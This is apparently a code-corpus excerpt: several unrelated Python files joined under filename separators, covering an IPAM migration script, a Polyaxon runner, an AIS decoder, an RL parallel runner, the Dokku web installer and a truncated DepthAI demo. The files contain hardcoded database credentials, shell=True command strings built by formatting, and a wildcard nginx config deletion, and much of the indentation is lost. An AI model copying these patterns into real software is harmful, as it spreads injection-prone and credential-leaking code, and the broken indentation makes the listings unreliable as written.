def get_ips(self):
results = self.get_data({'query': 'SELECT ipaddress, mac, status, dnsbackward FROM IPAM.IPNode'})
if results:
q = Queue.Queue()
for result in results['results']:
data = {}
ipaddress = result['ipaddress']
macaddress = result['mac']
status = result['status']
devicename = result['dnsbackward']
print ipaddress
if not self.include_broadcast:
split_ip = ipaddress.split('.')
last_ip_range_digit = split_ip[3]
                    if last_ip_range_digit == '0' or last_ip_range_digit == '255':  # network (.0) or broadcast (.255) address
                        print 'ip address {} is a network or broadcast address, skipping'.format(ipaddress)
continue
data.update({'ipaddress': ipaddress})
data.update({'macaddress': macaddress})
if status == 2:
data.update({'available':'yes'})
if status == 4:
data.update({'type':'reserved'})
if devicename and devicename not in ('',' '):
if hdevice:
data.update({'device': devicename})
if hlabel:
data.update({'tag': devicename})
q.put(data)
threads = []
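            # Drain the queue with a rolling pool of at most 20 poster threads; finished
            # threads are marked via has_jobs() and pruned before new ones are started.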
while 1:
if not q.empty():
self.has_jobs(threads)
threads = [t for t in threads if not t.stopped]
tcount = len(threads)
if tcount < 20:
ip = q.get()
print ip
p = CustomThread(target=d42.post_ip, args=(ip,))
p.start()
threads.append(p)
else:
time.sleep(0.5)
else:
while len(threads) != 0:
time.sleep(1)
self.has_jobs(threads)
threads = [t for t in threads if not t.stopped]
msg = 'Waiting for threads to finish. Current thread count: %s' % str(len(threads))
print msg
break
def has_jobs(self, threads):
for t in threads:
if not t.is_alive():
t.stopped = True
class CustomThread(threading.Thread):
def __init__(self, target, args):
self.stopped = False
threading.Thread.__init__(self, target=target, args=args)
def read_settings():
if not os.path.exists(CONFIG):
print '\n[!] Error. Cannot find config file!\n'
sys.exit()
cc = ConfigParser.RawConfigParser()
cc.readfp(open(CONFIG,"r"))
sw_ipam_server = cc.get('settings', 'sw_ipam_server')
sw_ipam_user = cc.get('settings', 'sw_ipam_user')
sw_ipam_secret = cc.get('settings', 'sw_ipam_secret')
d42_server = cc.get('settings', 'd42_server')
d42_user = cc.get('settings', 'd42_user')
d42_secret = cc.get('settings', 'd42_secret')
migrate_subnets = cc.getboolean('settings', 'migrate_subnets')
migrate_ips = cc.getboolean('settings', 'migrate_ips')
debug = cc.getboolean('settings', 'debug')
hdevice = cc.getboolean('settings', 'send_hostname_as_device')
hlabel = cc.getboolean('settings', 'send_hostname_as_label')
filter_broadcast = cc.getboolean('settings', 'include_broadcast_addresses')
return sw_ipam_server,sw_ipam_user,sw_ipam_secret,d42_server,d42_user,d42_secret,\
migrate_subnets, migrate_ips, debug, hdevice, hlabel, filter_broadcast
if __name__ == "__main__":
sw_ipam_server,sw_ipam_user,sw_ipam_secret,d42_server,d42_user,d42_secret,\
migrate_subnets, migrate_ips, debug, hdevice, hlabel, filter_broadcast = read_settings()
d42 = Device42(d42_server, d42_user, d42_secret, debug, hdevice, hlabel)
swis = SwisClient(sw_ipam_server, sw_ipam_user, sw_ipam_secret, filter_broadcast)
if migrate_subnets:
print 'getting subnets'
swis.get_subnets()
if migrate_ips:
print 'getting ips'
swis.get_ips()
print '\n[!] Done!'
sys.exit()
|
local_runner.py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
import atexit
import json
import os
import signal
import subprocess
import sys
import time
from six.moves import xrange
from multiprocessing import Process
from tensorflow.python.platform import tf_logging as logging
from polyaxon_schemas.polyaxonfile.polyaxonfile import PolyaxonFile
from polyaxon_schemas.polyaxonfile.specification import Specification
from polyaxon_schemas.utils import TaskType
from polyaxon_lib.polyaxonfile.manager import (
prepare_all_experiment_jobs,
start_experiment_run,
)
jobs = []
processes = []
current_run = {'finished': False, TaskType.MASTER: None}
def cleanup():
for job in jobs:
job.terminate()
job.join()
# Register cleanup function to the exit of this module
atexit.register(cleanup)
def signal_handler(*args):
for p in processes:
p.terminate()
current_run['finished'] = True
def check_master_process():
print([p.is_alive() for p in jobs])
if not current_run['master'].is_alive():
signal_handler()
cleanup()
def get_pybin():
try:
pybin = os.path.join(os.environ['VIRTUAL_ENV'], 'bin/python')
except: # pylint: disable=bare-except
pybin = sys.executable
return pybin
def run_cmd(pybin, cmd, cwd):
env_cmd = '{} {}'.format(pybin, cmd)
signal.signal(signal.SIGINT, signal_handler)
logging.info(env_cmd)
p = subprocess.Popen(env_cmd, cwd=cwd, shell=True)
processes.append(p)
_, error = p.communicate()
if error:
logging.error('{} - ERROR: '.format(error))
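# Launch one task (master/worker/ps) of an experiment in a separate Python process by
# re-invoking start_experiment_run through `python -c` with the serialized polyaxonfile.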
def create_process(env):
cmd = ("""-c \"from polyaxon_lib.polyaxonfile.local_runner import start_experiment_run;
start_experiment_run(
'{polyaxonfile}', '{experiment_id}', '{task_type}', {task_id}, '{schedule}')\"""".format(
**env))
p = Process(target=run_cmd, args=(get_pybin(), cmd, os.getcwd(),))
p.daemon = True
p.start()
jobs.append(p)
if env['task_type'] == TaskType.MASTER:
current_run[TaskType.MASTER] = p
def run_experiment(spec_config, xp):
spec = Specification.read(spec_config)
logging.info("running Experiment n: {}".format(xp))
cluster, is_distributed = spec.cluster_def
if not is_distributed:
start_experiment_run(spec, xp, TaskType.MASTER, 0, 'continuous_train_and_eval')
current_run['finished'] = True
else:
env = {
'polyaxonfile': json.dumps(spec.parsed_data),
'task_type': TaskType.MASTER,
'experiment_id': xp,
'task_id': 0,
'schedule': 'train_and_evaluate'
}
create_process(env)
for i in xrange(cluster.get(TaskType.WORKER, 0)):
env['task_id'] = i
env['task_type'] = TaskType.WORKER
env['schedule'] = 'train'
create_process(env)
for i in xrange(cluster.get(TaskType.PS, 0)):
env['task_id'] = i
env['task_type'] = TaskType.PS
env['schedule'] = 'run_std_server'
create_process(env)
for job in jobs:
job.join()
def run(polyaxonfile):
plx_file = PolyaxonFile.read(polyaxonfile)
for xp in range(plx_file.matrix_space):
run_experiment(plx_file.experiment_specs[xp], xp)
while not current_run['finished']:
check_master_process()
time.sleep(10)
current_run['finished'] = False
current_run['master'] = None
def run_all(polyaxonfile):
plx_file = PolyaxonFile.read(polyaxonfile)
for xp in range(plx_file.matrix_space):
xp_jobs = prepare_all_experiment_jobs(plx_file.experiment_specs[xp], xp)
for i, xp_job in enumerate(xp_jobs):
if i == 0:
schedule = 'train_and_evaluate'
else:
schedule = 'train'
p = Process(target=getattr(xp_job, schedule))
p.start()
jobs.append(p)
for job in jobs:
job.join()
|
decoder.py
|
import logging
import platform
from datetime import datetime
from multiprocessing import Process, Pool
from time import sleep
import psutil
from ais import stream
from pymongo import MongoClient, errors
from requests import post
from src.functions import more_processing
software_version = 0.2
inFile = "ais_undecoded.msg"
outFile = 'ais_decoded.txt'
LOG_FILE_NAME = "decoder.log"
HCTK_URL = 'http://bigdata2.research.cs.dal.ca:8087/beat'
def save_mongo(result):
client = MongoClient('mongodb://useradmin:[email protected]:27011/ais')
try:
client.ais.ais_data.insert_many(result)
for message in result:
more_processing(message)
except errors.PyMongoError as e:
print("save_mongo(): ", str(e))
def utc_time(date_obj):
try:
return datetime.strptime(date_obj, "%Y-%m-%d %H:%M:%S.%f")
except Exception as e:
print("utc_time():", str(e))
# Take a file path, read it and decode each AIS message it contains
def read_file_decode(file_path):
client = MongoClient('mongodb://useradmin:[email protected]:27011/ais')
lst = []
logging.error("Starting on file: " + file_path)
counter = 0
with open(file_path) as msg_file:
for msg in stream.decode(msg_file):
msg['batch'] = True
time = utc_time(msg_file.readline().strip('\n'))
if time:
msg['event_time'] = time
try:
x = msg.get('x', None)
y = msg.get('y', None)
if x is not None and y is not None and abs(x) <= 180 and abs(y) < 90:
msg['location'] = {'type': 'Point', 'coordinates': [x, y]}
except Exception as e:
print("read_file_decode():", str(e))
if len(lst) != 1000:
lst.append(msg)
else:
save_mongo(lst)
lst.clear()
lst.append(msg)
if lst:
save_mongo(lst)
lst.clear()
logging.error("Finished Decoding " + file_path)
with open(outFile, 'a+') as outF:
outF.write(file_path + '\n')
def system_status():
os, name, version, _, _, _ = platform.uname()
version = version.split('-')[0]
cores = psutil.cpu_count()
cpu_percent = psutil.cpu_percent()
memory_percent = psutil.virtual_memory()[2]
disk_percent = psutil.disk_usage('/')[3]
boot_time = datetime.fromtimestamp(psutil.boot_time())
running_since = boot_time.strftime("%A %d. %B %Y")
res = {
"os": os,
"OS Version": version,
"health_check_repeat": 600,
"name": "File Decoder",
"cores": cores,
'risk_mitigation_file': __file__,
"disk percent": disk_percent,
"cpu percent": cpu_percent,
"memory percent": memory_percent,
"running since": running_since,
"App version": software_version
}
return res
def health_check():
while 1:
print("Calling Health Check")
try:
res = system_status()
upload(res)
except Exception as e:
print("health_check():" + str(e))
finally:
sleep(600)
def upload(data):
try:
headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
post(HCTK_URL, json=data, headers=headers, timeout=40)
except Exception as e:
print("hchk:" + e)
def follow(thefile):
thefile.seek(0, 2)
while True:
line = thefile.readline()
if not line:
sleep(0.1)
continue
yield line
def decode_pool(values):
pool = Pool(processes=10)
pool.map(read_file_decode, values)
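# Decode the backlog of files listed in inFile with a worker pool, then keep following
# the file and decode every newly appended path in its own process.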
def decode_proc():
inputFile = open(inFile, 'r')
inputFiles = [x.rstrip() for x in inputFile]
Process(target=decode_pool, args=(inputFiles,)).start()
input_lines = follow(inputFile)
for line in input_lines:
print("Working on:", line)
line = line.rstrip()
        Process(target=read_file_decode, args=(line,)).start()
if __name__ == '__main__':
for handler in logging.root.handlers[:]: logging.root.removeHandler(handler)
logging.basicConfig(level=logging.ERROR, format='%(asctime)s:\n %(message)s\n',
datefmt='%m/%d/%Y %I:%M:%S %p', filename=LOG_FILE_NAME)
logging.error("Running at " + str(datetime.now()))
try:
Process(target=decode_proc).start()
Process(target=health_check, daemon=True).start()
except Exception as e:
print("main():" + str(e))
|
parallel_runner.py
|
from envs import REGISTRY as env_REGISTRY
from functools import partial
from components.episode_buffer import EpisodeBatch
from multiprocessing import Pipe, Process
import numpy as np
import torch as th
from modules.utils.maven_module import EZAgent as enza
# Based (very) heavily on SubprocVecEnv from OpenAI Baselines
# https://github.com/openai/baselines/blob/master/baselines/common/vec_env/subproc_vec_env.py
class ParallelRunner:
def __init__(self, args, logger):
self.args = args
self.logger = logger
self.batch_size = self.args.batch_size_run
# Make subprocesses for the envs
self.parent_conns, self.worker_conns = zip(*[Pipe() for _ in range(self.batch_size)])
env_fn = env_REGISTRY[self.args.env]
self.ps = [Process(target=env_worker, args=(worker_conn, CloudpickleWrapper(partial(env_fn, **self.args.env_args))))
for worker_conn in self.worker_conns]
for p in self.ps:
p.daemon = True
p.start()
self.parent_conns[0].send(("get_env_info", None))
self.env_info = self.parent_conns[0].recv()
self.episode_limit = self.env_info["episode_limit"]
self.t = 0
self.t_env = 0
self.train_returns = []
self.test_returns = []
self.train_stats = {}
self.test_stats = {}
self.log_train_stats_t = -100000
def setup(self, scheme, groups, preprocess, mac):
self.new_batch = partial(EpisodeBatch, scheme, groups, self.batch_size, self.episode_limit + 1,
preprocess=preprocess, device=self.args.device)
self.mac = mac
self.scheme = scheme
self.groups = groups
self.preprocess = preprocess
if self.args.name == 'maven':
self.noise_distrib = enza(self.args, logger=self.logger)
if self.args.use_cuda:
self.noise_distrib.cuda()
def get_env_info(self):
return self.env_info
def save_replay(self):
pass
def close_env(self):
for parent_conn in self.parent_conns:
parent_conn.send(("close", None))
def reset(self):
self.batch = self.new_batch()
# Reset the envs
for parent_conn in self.parent_conns:
parent_conn.send(("reset", None))
pre_transition_data = {
"state": [],
"avail_actions": [],
"obs": []
}
# Get the obs, state and avail_actions back
for parent_conn in self.parent_conns:
data = parent_conn.recv()
pre_transition_data["state"].append(data["state"])
pre_transition_data["avail_actions"].append(data["avail_actions"])
pre_transition_data["obs"].append(data["obs"])
self.batch.update(pre_transition_data, ts=0)
if self.args.name == 'maven':
self.noise = self.noise_distrib.sample(self.batch['state'][:,0], False)
self.batch.update({"noise": self.noise}, ts=0)
self.t = 0
self.env_steps_this_run = 0
def run(self, test_mode=False):
self.reset()
all_terminated = False
episode_returns = [0 for _ in range(self.batch_size)]
episode_lengths = [0 for _ in range(self.batch_size)]
self.mac.init_hidden(batch_size=self.batch_size)
terminated = [False for _ in range(self.batch_size)]
envs_not_terminated = [b_idx for b_idx, termed in enumerate(terminated) if not termed]
final_env_infos = [] # may store extra stats like battle won. this is filled in ORDER OF TERMINATION
while True:
# Pass the entire batch of experiences up till now to the agents
# Receive the actions for each agent at this timestep in a batch for each un-terminated env
actions = self.mac.select_actions(self.batch, t_ep=self.t, t_env=self.t_env, bs=envs_not_terminated, test_mode=test_mode)
cpu_actions = actions.to("cpu").numpy()
# Update the actions taken
actions_chosen = {
"actions": actions.unsqueeze(1)
}
self.batch.update(actions_chosen, bs=envs_not_terminated, ts=self.t, mark_filled=False)
# Send actions to each env
action_idx = 0
for idx, parent_conn in enumerate(self.parent_conns):
if idx in envs_not_terminated: # We produced actions for this env
if not terminated[idx]: # Only send the actions to the env if it hasn't terminated
parent_conn.send(("step", cpu_actions[action_idx]))
action_idx += 1 # actions is not a list over every env
# Update envs_not_terminated
envs_not_terminated = [b_idx for b_idx, termed in enumerate(terminated) if not termed]
all_terminated = all(terminated)
if all_terminated:
break
# Post step data we will insert for the current timestep
post_transition_data = {
"reward": [],
"terminated": []
}
# Data for the next step we will insert in order to select an action
pre_transition_data = {
"state": [],
"avail_actions": [],
"obs": []
}
# Receive data back for each unterminated env
for idx, parent_conn in enumerate(self.parent_conns):
if not terminated[idx]:
data = parent_conn.recv()
# Remaining data for this current timestep
post_transition_data["reward"].append((data["reward"],))
episode_returns[idx] += data["reward"]
episode_lengths[idx] += 1
if not test_mode:
self.env_steps_this_run += 1
env_terminated = False
if data["terminated"]:
final_env_infos.append(data["info"])
if data["terminated"] and not data["info"].get("episode_limit", False):
env_terminated = True
terminated[idx] = data["terminated"]
post_transition_data["terminated"].append((env_terminated,))
# Data for the next timestep needed to select an action
pre_transition_data["state"].append(data["state"])
pre_transition_data["avail_actions"].append(data["avail_actions"])
pre_transition_data["obs"].append(data["obs"])
# Add post_transiton data into the batch
self.batch.update(post_transition_data, bs=envs_not_terminated, ts=self.t, mark_filled=False)
# Move onto the next timestep
self.t += 1
# Add the pre-transition data
self.batch.update(pre_transition_data, bs=envs_not_terminated, ts=self.t, mark_filled=True)
if not test_mode:
self.t_env += self.env_steps_this_run
# Get stats back for each env
for parent_conn in self.parent_conns:
parent_conn.send(("get_stats",None))
env_stats = []
for parent_conn in self.parent_conns:
env_stat = parent_conn.recv()
env_stats.append(env_stat)
cur_stats = self.test_stats if test_mode else self.train_stats
cur_returns = self.test_returns if test_mode else self.train_returns
log_prefix = "test_" if test_mode else ""
infos = [cur_stats] + final_env_infos
cur_stats.update({k: sum(d.get(k, 0) for d in infos) for k in set.union(*[set(d) for d in infos])})
cur_stats["n_episodes"] = self.batch_size + cur_stats.get("n_episodes", 0)
cur_stats["ep_length"] = sum(episode_lengths) + cur_stats.get("ep_length", 0)
cur_returns.extend(episode_returns)
# maven
if self.args.name == 'maven':
self.noise_distrib.update_returns(self.batch['state'][:,0], self.noise, episode_returns, test_mode, self.t_env)
n_test_runs = max(1, self.args.test_nepisode // self.batch_size) * self.batch_size
if test_mode and (len(self.test_returns) == n_test_runs):
self._log(cur_returns, cur_stats, log_prefix)
elif self.t_env - self.log_train_stats_t >= self.args.runner_log_interval:
self._log(cur_returns, cur_stats, log_prefix)
if hasattr(self.mac.action_selector, "epsilon"):
self.logger.log_stat("epsilon", self.mac.action_selector.epsilon, self.t_env)
self.log_train_stats_t = self.t_env
return self.batch
def _log(self, returns, stats, prefix):
self.logger.log_stat(prefix + "return_mean", np.mean(returns), self.t_env)
self.logger.log_stat(prefix + "return_std", np.std(returns), self.t_env)
returns.clear()
for k, v in stats.items():
if k != "n_episodes":
self.logger.log_stat(prefix + k + "_mean" , v/stats["n_episodes"], self.t_env)
stats.clear()
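# Worker loop run in each child process: receives (cmd, data) tuples over the pipe and
# answers "step", "reset", "close", "get_env_info" and "get_stats" requests against its
# own environment instance.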
def env_worker(remote, env_fn):
# Make environment
env = env_fn.x()
while True:
cmd, data = remote.recv()
if cmd == "step":
actions = data
# Take a step in the environment
reward, terminated, env_info = env.step(actions)
# Return the observations, avail_actions and state to make the next action
state = env.get_state()
avail_actions = env.get_avail_actions()
obs = env.get_obs()
remote.send({
# Data for the next timestep needed to pick an action
"state": state,
"avail_actions": avail_actions,
"obs": obs,
# Rest of the data for the current timestep
"reward": reward,
"terminated": terminated,
"info": env_info
})
elif cmd == "reset":
env.reset()
remote.send({
"state": env.get_state(),
"avail_actions": env.get_avail_actions(),
"obs": env.get_obs()
})
elif cmd == "close":
env.close()
remote.close()
break
elif cmd == "get_env_info":
remote.send(env.get_env_info())
elif cmd == "get_stats":
remote.send(env.get_stats())
else:
raise NotImplementedError
class CloudpickleWrapper():
"""
Uses cloudpickle to serialize contents (otherwise multiprocessing tries to use pickle)
"""
def __init__(self, x):
self.x = x
def __getstate__(self):
import cloudpickle
return cloudpickle.dumps(self.x)
def __setstate__(self, ob):
import pickle
self.x = pickle.loads(ob)
|
dokku-installer.py
|
#!/usr/bin/env python2.7
import cgi
import json
import os
import re
import SimpleHTTPServer
import SocketServer
import subprocess
import sys
import threading
VERSION = 'v0.12.13'
hostname = ''
try:
command = "bash -c '[[ $(dig +short $HOSTNAME) ]] && echo $HOSTNAME || wget -q -O - icanhazip.com'"
hostname = subprocess.check_output(command, shell=True)
if ':' in hostname:
hostname = ''
except subprocess.CalledProcessError:
pass
key_file = os.getenv('KEY_FILE', '/root/.ssh/authorized_keys')
admin_keys = []
if os.path.isfile(key_file):
try:
command = "cat {0}".format(key_file)
admin_keys = subprocess.check_output(command, shell=True).strip().split("\n")
except subprocess.CalledProcessError:
pass
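# When started with the 'onboot' argument, write upstart/systemd units and an nginx vhost
# so the installer comes back up after a reboot, then exit without serving.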
def check_boot():
if 'onboot' not in sys.argv:
return
init_dir = os.getenv('INIT_DIR', '/etc/init')
systemd_dir = os.getenv('SYSTEMD_DIR', '/etc/systemd/system')
nginx_dir = os.getenv('NGINX_DIR', '/etc/nginx/conf.d')
if os.path.exists(init_dir):
with open('{0}/dokku-installer.conf'.format(init_dir), 'w') as f:
f.write("start on runlevel [2345]\n")
f.write("exec {0} selfdestruct\n".format(os.path.abspath(__file__)))
if os.path.exists(systemd_dir):
with open('{0}/dokku-installer.service'.format(systemd_dir), 'w') as f:
f.write("[Unit]\n")
f.write("Description=Dokku web-installer\n")
f.write("\n")
f.write("[Service]\n")
f.write("ExecStart={0} selfdestruct\n".format(os.path.abspath(__file__)))
f.write("\n")
f.write("[Install]\n")
f.write("WantedBy=multi-user.target\n")
f.write("WantedBy=graphical.target\n")
if os.path.exists(nginx_dir):
with open('{0}/dokku-installer.conf'.format(nginx_dir), 'w') as f:
f.write("upstream dokku-installer { server 127.0.0.1:2000; }\n")
f.write("server {\n")
f.write(" listen 80;\n")
f.write(" location / {\n")
f.write(" proxy_pass http://dokku-installer;\n")
f.write(" }\n")
f.write("}\n")
subprocess.call('rm -f /etc/nginx/sites-enabled/*', shell=True)
sys.exit(0)
class GetHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
content = PAGE.replace('{VERSION}', VERSION)
content = content.replace('{HOSTNAME}', hostname)
content = content.replace('{ADMIN_KEYS}', "\n".join(admin_keys))
self.send_response(200)
self.end_headers()
self.wfile.write(content)
def do_POST(self):
if self.path not in ['/setup', '/setup/']:
return
params = cgi.FieldStorage(fp=self.rfile,
headers=self.headers,
environ={
'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': self.headers['Content-Type']})
vhost_enable = 'false'
dokku_root = os.getenv('DOKKU_ROOT', '/home/dokku')
if 'vhost' in params and params['vhost'].value == 'true':
vhost_enable = 'true'
with open('{0}/VHOST'.format(dokku_root), 'w') as f:
f.write(params['hostname'].value)
else:
try:
os.remove('{0}/VHOST'.format(dokku_root))
except OSError:
pass
with open('{0}/HOSTNAME'.format(dokku_root), 'w') as f:
f.write(params['hostname'].value)
for (index, key) in enumerate(params['keys'].value.splitlines(), 1):
user = 'admin'
if self.admin_user_exists() is not None:
user = 'web-admin'
if self.web_admin_user_exists() is not None:
index = int(self.web_admin_user_exists()) + 1
elif self.web_admin_user_exists() is None:
index = 1
elif self.admin_user_exists() is None:
pass
else:
index = int(self.admin_user_exists()) + 1
user = user + str(index)
command = ['sshcommand', 'acl-add', 'dokku', user]
proc = subprocess.Popen(command, stdin=subprocess.PIPE)
proc.stdin.write(key)
proc.stdin.close()
proc.wait()
set_debconf_selection('boolean', 'nginx_enable', 'true')
set_debconf_selection('boolean', 'skip_key_file', 'true')
set_debconf_selection('boolean', 'vhost_enable', vhost_enable)
set_debconf_selection('boolean', 'web_config', 'false')
set_debconf_selection('string', 'hostname', params['hostname'].value)
if 'selfdestruct' in sys.argv:
DeleteInstallerThread()
self.send_response(200)
self.end_headers()
self.wfile.write(json.dumps({'status': 'ok'}))
def web_admin_user_exists(self):
return self.user_exists('web-admin(\d+)')
def admin_user_exists(self):
return self.user_exists('admin(\d+)')
def user_exists(self, name):
command = 'dokku ssh-keys:list'
pattern = re.compile(r'NAME="' + name + '"')
proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
max_num = 0
exists = False
for line in proc.stdout:
m = pattern.search(line)
if m:
# User of the form `user` or `user#` exists
exists = True
                max_num = max(max_num, int(m.group(1)))
if exists:
return max_num
else:
return None
def set_debconf_selection(debconf_type, key, value):
found = False
with open('/etc/os-release', 'r') as f:
for line in f:
if 'debian' in line:
found = True
if not found:
return
ps = subprocess.Popen(['echo', 'dokku dokku/{0} {1} {2}'.format(
key, debconf_type, value
)], stdout=subprocess.PIPE)
try:
subprocess.check_output(['debconf-set-selections'], stdin=ps.stdout)
except subprocess.CalledProcessError:
pass
ps.wait()
class DeleteInstallerThread(object):
def __init__(self, interval=1):
thread = threading.Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
command = "rm /etc/nginx/conf.d/dokku-installer.conf && /etc/init.d/nginx stop && /etc/init.d/nginx start"
try:
subprocess.call(command, shell=True)
except:
pass
command = "rm -f /etc/init/dokku-installer.conf /etc/systemd/system/dokku-installer.service && (stop dokku-installer || systemctl stop dokku-installer.service)"
try:
subprocess.call(command, shell=True)
except:
pass
def main():
check_boot()
port = int(os.getenv('PORT', 2000))
httpd = SocketServer.TCPServer(("", port), GetHandler)
print "Listening on 0.0.0.0:{0}, CTRL+C to stop".format(port)
httpd.serve_forever()
PAGE = """
<html>
<head>
<title>Dokku Setup</title>
<link rel="stylesheet" href="//netdna.bootstrapcdn.com/bootstrap/3.0.0/css/bootstrap.min.css" />
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>
</head>
<body>
<div class="container" style="width: 640px;">
<form id="form" role="form">
<h1>Dokku Setup <small>{VERSION}</small></h1>
<div class="form-group">
<h3><small style="text-transform: uppercase;">Admin Access</small></h3>
<label for="key">Public Key</label><br />
<textarea class="form-control" name="keys" rows="7" id="key">{ADMIN_KEYS}</textarea>
</div>
<div class="form-group">
<h3><small style="text-transform: uppercase;">Hostname Configuration</small></h3>
<div class="form-group">
<label for="hostname">Hostname</label>
<input class="form-control" type="text" id="hostname" name="hostname" value="{HOSTNAME}" />
</div>
<div class="checkbox">
<label><input id="vhost" name="vhost" type="checkbox" value="true"> Use <abbr title="Nginx will be run on port 80 and backend to your apps based on hostname">virtualhost naming</abbr> for apps</label>
</div>
<p>Your app URLs will look like:</p>
<pre id="example">http://hostname:port</pre>
</div>
<button type="button" onclick="setup()" class="btn btn-primary">Finish Setup</button> <span style="padding-left: 20px;" id="result"></span>
</form>
</div>
<div id="error-output"></div>
<script>
function setup() {
if ($.trim($("#key").val()) == "") {
alert("Your admin public key cannot be blank.")
return
}
if ($.trim($("#hostname").val()) == "") {
alert("Your hostname cannot be blank.")
return
}
data = $("#form").serialize()
$("input,textarea,button").prop("disabled", true);
$.post('/setup', data)
.done(function() {
$("#result").html("Success!")
window.location.href = "http://dokku.viewdocs.io/dokku~{VERSION}/deployment/application-deployment/";
})
.fail(function(data) {
$("#result").html("Something went wrong...")
$("#error-output").html(data.responseText)
});
}
function update() {
if ($("#vhost").is(":checked") && $("#hostname").val().match(/^(\d{1,3}\.){3}\d{1,3}$/)) {
alert("In order to use virtualhost naming, the hostname must not be an IP but a valid domain name.")
$("#vhost").prop('checked', false);
}
if ($("#vhost").is(':checked')) {
$("#example").html("http://<app-name>."+$("#hostname").val())
} else {
$("#example").html("http://"+$("#hostname").val()+":<app-port>")
}
}
$("#vhost").change(update);
$("#hostname").change(update);
update();
</script>
</body>
</html>
"""
if __name__ == "__main__":
main()
|
main.py
|
import argparse
import queue
import threading
import signal
from pathlib import Path
import cv2
import depthai
import numpy as np
from imutils.video import FPS
from math import cos, sin
parser = argparse.ArgumentParser()
parser.add_argument('-nd', '--no-debug', action="store_true", help="Prevent debug output")
parser.add_argument('-cam', '--camera', action="store_true", help="Use DepthAI 4K RGB camera for inference (conflicts with -vid)")
parser.add_argument('-vid', '--video', type=str, help="Path to video file to be used for inference (conflicts with -cam)")
parser.add_argument('-laz', '--lazer', action="store_true", help="Lazer mode")
args = parser.parse_args()
debug = not args.no_debug
camera = not args.video
if args.camera and args.video:
raise ValueError("Incorrect command line parameters! \"-cam\" cannot be used with \"-vid\"!")
elif args.camera is False and args.video is None:
raise ValueError("Missing inference source! Either use \"-cam\" to run on DepthAI camera or \"-vid <path>\" to run on video file")
def draw_3d_axis(image, head_pose, origin, size=50):
# From https://github.com/openvinotoolkit/open_model_zoo/blob/b1ff98b64a6222cf6b5f3838dc0271422250de95/demos/gaze_estimation_demo/cpp/src/results_marker.cpp#L50
    origin_x, origin_y = origin
    yaw, pitch, roll = np.array(head_pose) * np.pi / 180
    sinY = sin(yaw)
    sinP = sin(pitch)
    sinR = sin(roll)
    cosY = cos(yaw)
    cosP = cos(pitch)
    cosR = cos(roll)
# X axis (red)
x1 = origin_x + size * (cosR * cosY + sinY * sinP * sinR)
y1 = origin_y + size * cosP * sinR
cv2.line(image, (origin_x, origin_y), (int(x1), int(y1)), (0, 0, 255), 3)
# Y axis (green)
x2 = origin_x + size * (cosR * sinY * sinP + cosY * sinR)
y2 = origin_y - size * cosP * cosR
cv2.line(image, (origin_x, origin_y), (int(x2), int(y2)), (0, 255, 0), 3)
# Z axis (blue)
x3 = origin_x + size * (sinY * cosP)
y3 = origin_y + size * sinP
cv2.line(image, (origin_x, origin_y), (int(x3), int(y3)), (255, 0, 0), 2)
return image
def frame_norm(frame, bbox):
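    # Detections are normalised to [0, 1]; scale the x values by the frame
    # width and the y values by the frame height to get pixel coordinates.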
norm_vals = np.full(len(bbox), frame.shape[0])
norm_vals[::2] = frame.shape[1]
return (np.clip(np.array(bbox), 0, 1) * norm_vals).astype(int)
def to_planar(arr: np.ndarray, shape: tuple) -> list:
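    # Resize the frame and flatten it in planar (channel-first) order before
    # sending it to the device as an NNData layer.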
return [val for channel in cv2.resize(arr, shape).transpose(2, 0, 1) for y_col in channel for val in y_col]
def to_tensor_result(packet):
return {
tensor.name: np.array(packet.getLayerFp16(tensor.name)).reshape(tensor.dims)
for tensor in packet.getRaw().tensors
}
def padded_point(point, padding, frame_shape=None):
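    # Build a square box of half-size `padding` around `point`; when a frame
    # shape is given, clamp the box to the frame and return None if it falls
    # completely outside of it.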
if frame_shape is None:
return [
point[0] - padding,
point[1] - padding,
point[0] + padding,
point[1] + padding
]
else:
def norm(val, dim):
return max(0, min(val, dim))
if np.any(point - padding > frame_shape[:2]) or np.any(point + padding < 0):
print(f"Unable to create padded box for point {point} with padding {padding} and frame shape {frame_shape[:2]}")
return None
return [
norm(point[0] - padding, frame_shape[0]),
norm(point[1] - padding, frame_shape[1]),
norm(point[0] + padding, frame_shape[0]),
norm(point[1] + padding, frame_shape[1])
]
def create_pipeline():
print("Creating pipeline...")
pipeline = depthai.Pipeline()
pipeline.setOpenVINOVersion(depthai.OpenVINO.VERSION_2020_3)
if camera:
print("Creating Color Camera...")
cam = pipeline.createColorCamera()
cam.setPreviewSize(300, 300)
cam.setResolution(depthai.ColorCameraProperties.SensorResolution.THE_1080_P)
cam.setInterleaved(False)
cam.setBoardSocket(depthai.CameraBoardSocket.RGB)
cam_xout = pipeline.createXLinkOut()
cam_xout.setStreamName("cam_out")
cam.preview.link(cam_xout.input)
# NeuralNetwork
print("Creating Face Detection Neural Network...")
face_nn = pipeline.createNeuralNetwork()
face_nn.setBlobPath(str(Path("models/face-detection-retail-0004/face-detection-retail-0004_openvino_2020.1_4shave.blob").resolve().absolute()))
if camera:
cam.preview.link(face_nn.input)
else:
face_in = pipeline.createXLinkIn()
face_in.setStreamName("face_in")
face_in.out.link(face_nn.input)
face_nn_xout = pipeline.createXLinkOut()
face_nn_xout.setStreamName("face_nn")
face_nn.out.link(face_nn_xout.input)
# NeuralNetwork
print("Creating Landmarks Detection Neural Network...")
land_nn = pipeline.createNeuralNetwork()
land_nn.setBlobPath(
str(Path("models/landmarks-regression-retail-0009/landmarks-regression-retail-0009_openvino_2020.1_4shave.blob").resolve().absolute())
)
land_nn_xin = pipeline.createXLinkIn()
land_nn_xin.setStreamName("landmark_in")
land_nn_xin.out.link(land_nn.input)
land_nn_xout = pipeline.createXLinkOut()
land_nn_xout.setStreamName("landmark_nn")
land_nn.out.link(land_nn_xout.input)
# NeuralNetwork
print("Creating Head Pose Neural Network...")
pose_nn = pipeline.createNeuralNetwork()
pose_nn.setBlobPath(
str(Path("models/head-pose-estimation-adas-0001/head-pose-estimation-adas-0001_openvino_2020.1_4shave.blob").resolve().absolute())
)
pose_nn_xin = pipeline.createXLinkIn()
pose_nn_xin.setStreamName("pose_in")
pose_nn_xin.out.link(pose_nn.input)
